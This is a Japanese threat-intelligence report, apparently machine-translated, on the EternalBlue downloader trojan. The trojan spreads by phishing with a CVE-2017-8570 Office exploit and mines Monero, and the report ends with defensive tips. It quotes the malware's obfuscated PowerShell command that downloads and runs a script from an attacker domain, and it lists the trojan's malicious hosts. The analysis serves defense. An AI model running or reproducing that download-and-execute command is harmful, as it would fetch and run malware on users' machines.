「EternalBlue ダウンローダー トロイの木馬」は、ユーザーのマシンを使用して Monero を採掘し、拡散するためにフィッシング メールを追加します。

「EternalBlue ダウンローダー トロイの木馬」は、ユーザーのマシンを使用して Monero を採掘し、拡散するためにフィッシング メールを追加します。

出典: テンセント ユジアン 脅威インテリジェンス センター

編集者注: 元のタイトルは「フィッシングメールを通じて「Eternal Blue Downloader Trojan」が新たに拡散、添付ファイルには CVE-2017-8570 脆弱性攻撃コードが含まれている」です。

「Eternal Blue」ダウンローダー型トロイの木馬が感染したユーザーのマシン上で実行されると、現在のユーザーの電子メール アドレス帳が自動的に開き、「urgent.doc」という添付ファイル付きの文書が送信されます。この添付ファイルには、CVE-2017-8570 脆弱性 (Sandworm II とも呼ばれる、リスクの高い Office 脆弱性) に対する攻撃コードが含まれています。

攻撃を受けたユーザーが電子メールを受信し、誤ってドキュメントを開くと、脆弱性がトリガーされ、Powershell コマンドが実行され、mail.jsp がダウンロードされる可能性があります。

 C:/Windows/System32/cmd.exe /c powershell IE`x(New-Object Net.WebC`lient).DownLoadString(http://ap35nf7.jp/mail.jsp?Administrator*OUHH1)

ダウンロードに使用されたドメイン名 ap35nf7.jp は実際には登録されていませんが、アドレス t.awcna.com に解決できます。これは、感染したマシンのローカル ホスト ファイルが改ざんされ、ランダムに生成されたドメイン名がトロイの木馬が使用する悪意のあるアドレスにマッピングされるためです。詳細については、Yujian Threat Intelligence Center が以前に公開したレポート「「Eternal Blue Downloader」トロイの木馬は、ホストを改ざんしてランダムなドメイン名を指定し、複数の脆弱性を利用してイントラネット マイニングを攻撃します。」を参照してください。

この攻撃中、トロイの木馬はランダムに生成された文字とサフィックス「.cn」、「.jp」、「.kr」を DGA ドメイン名として使用し、hosts ファイル内のドメイン名を指します。

 t.tr2q.com、t.awcna.com、t.amynx.com

mail.jsp は非常に難読化されています。複数回の復号化の後、実行用の Powershell スクリプトをダウンロードするための複数のスケジュールされたタスクがインストールされ、新しいスケジュールされたタスク名「Bluetea」が使用されていることがわかります。

「EternalBlue」ダウンローダー型トロイの木馬は、最初の PE サンプル攻撃から、その後の検出回避のための Powershell ファイルレス攻撃への移行、そして複数の種類のスケジュールされたタスクをインストールすることで存続するまで、登場以来更新を止めていません。拡散方法に関しては、サプライチェーン攻撃を通じて感染マシンを大量に蓄積した後、「EternalBlue」脆弱性、MSSqlブラスト、$IPCブラスト、RDPブラストなどの方法を使用してウイルスを拡散し続けました。最近では、DGA ドメイン名攻撃とフィッシング メール攻撃も追加されました。その最終的な目標は、ユーザーのマシンを使用して Monero を採掘し、利益を得ることだけです。

EternalBlue Downloader トロイの木馬の以前のバージョンは、次の表に更新されています。

安全のヒント

1. ユーザーは、不明なソースからの電子メールの添付ファイルを簡単に開かず、電子メールの添付ファイル内のファイルを実行する際には細心の注意を払うことをお勧めします。スクリプトやその他の実行可能ファイルを見つけた場合は、まずウイルス対策ソフトウェアを使用してそれらをスキャンしてください。

2. サーバーは、特に IPC$、MSSQL、および RDP アカウントのパスワードに対して安全なパスワード ポリシーを使用します。弱いパスワードによるブルートフォース攻撃を回避するために、弱いパスワードを使用しないでください。

3. Microsoft のセキュリティ発表に従って、Office の脆弱性 CVE-2017-8570 を速やかに修正します。脆弱性のスキャンと修復が必要です。または、Windows Update が使用されます。

<<:  Filecoin はどれほどの驚きをもたらすことができるでしょうか?まず、BTCとETHとの違いを見てみましょう。

>>:  2020年第1四半期のビットコインデータの傾向をレビューした記事

推薦する

ギフト共同創設者:ビットコインは現段階ではまだ単なる商品に過ぎない

デジタルギフトカードプラットフォームのGyftが初めてビットコイン決済を導入したとき、ビットコインで...

連邦準備制度理事会が初の公式Facebookアカウントを開設したが、ビットコイン愛好家から攻撃を受けた。

米連邦準備制度理事会(米国の中央銀行)は最近、公式Facebookアカウントを開設したが、予想外にネ...

回復はまだ続いており、今週の市場はそれほど悪くないだろう

連邦準備制度理事会が7月に金利を100ベーシスポイント引き上げる可能性はわずか29.1%で、残りの可...

新華社金融観察:ビットコインの新たな上昇の勢いは?

新華社ワシントン6月17日(記者ヤン・チェンリン)最近、ビットコイン1枚あたりの価格が9,000ドル...

ソフトバンク関係者、ビットメインとの投資協力はないと明言

コインテレグラフによると、ソフトバンクグループ広報室の湯浅健一氏は、ソフトバンクグループもソフトバン...

UEBOT 定量取引リアルタイム 1 月 8 日: ショートポジション |累積損失7%

序文UEBOTクラウドベースのビットコイン定量裁定ロボットサービスの取引戦略がどのように機能するかを...

星雲全国ツアー広州駅が大盛況のうちに終了しました!

「星雲全国ツアー」第2弾は4月12日、広州天河ヒルトンホテルにて大盛況のうちに終了しました!このイ...

桂花科技創業者、肖桂花氏:鉱業の生き残りルールは性別による優位性ではなく、働き方にある - Wabi.com との独占インタビュー

「西川の八卦を学び、軍札を袖に持ちなさい。女性は喜んでそれを受け取るのに、なぜ将軍が夫でなければなら...

詳細 |乾季が近づくにつれ、ビットコイン採掘産業チェーン全体の分析

まとめビットコインは注目に値する代替資産です。ビットコインは、投資収益率が高く、流動性が高く、他の資...

ブルームバーグ:不公平な規制環境によりブロックチェーンは忘れ去られる

ブルームバーグニュースの編集委員会は、ブロックチェーン開発、特にビットコインのようなパブリックブロッ...

インドのビットコイン取引所Unocoinは、Blume Venturesが主導し、デジタル通貨企業も参加した新たな資金調達で150万ドルを調達した。

インドのビットコイン取引所スタートアップUncoinは新たな資金調達ラウンドで150万ドルを調達した...

インド中央銀行総裁:低金利政策は利益よりも害をもたらす

インド準備銀行のラグラム・ラジャン総裁は、中央銀行の非伝統的な金融政策に疑問を呈し、低金利を盲目的に...

先週、1億2,700万ドルが暗号通貨ファンドに流入し、約3か月ぶりの高水準となった。

ロシアのウクライナ侵攻によって引き起こされた数週間の市場混乱の後、投資家心理は安定しつつあるようだ。...

ビットコイン取引所T0.comがブロックチェーン技術を開発

Overstock.com の子会社T0.com は最近、暗号通貨コミュニティにいくつかの朗報を発...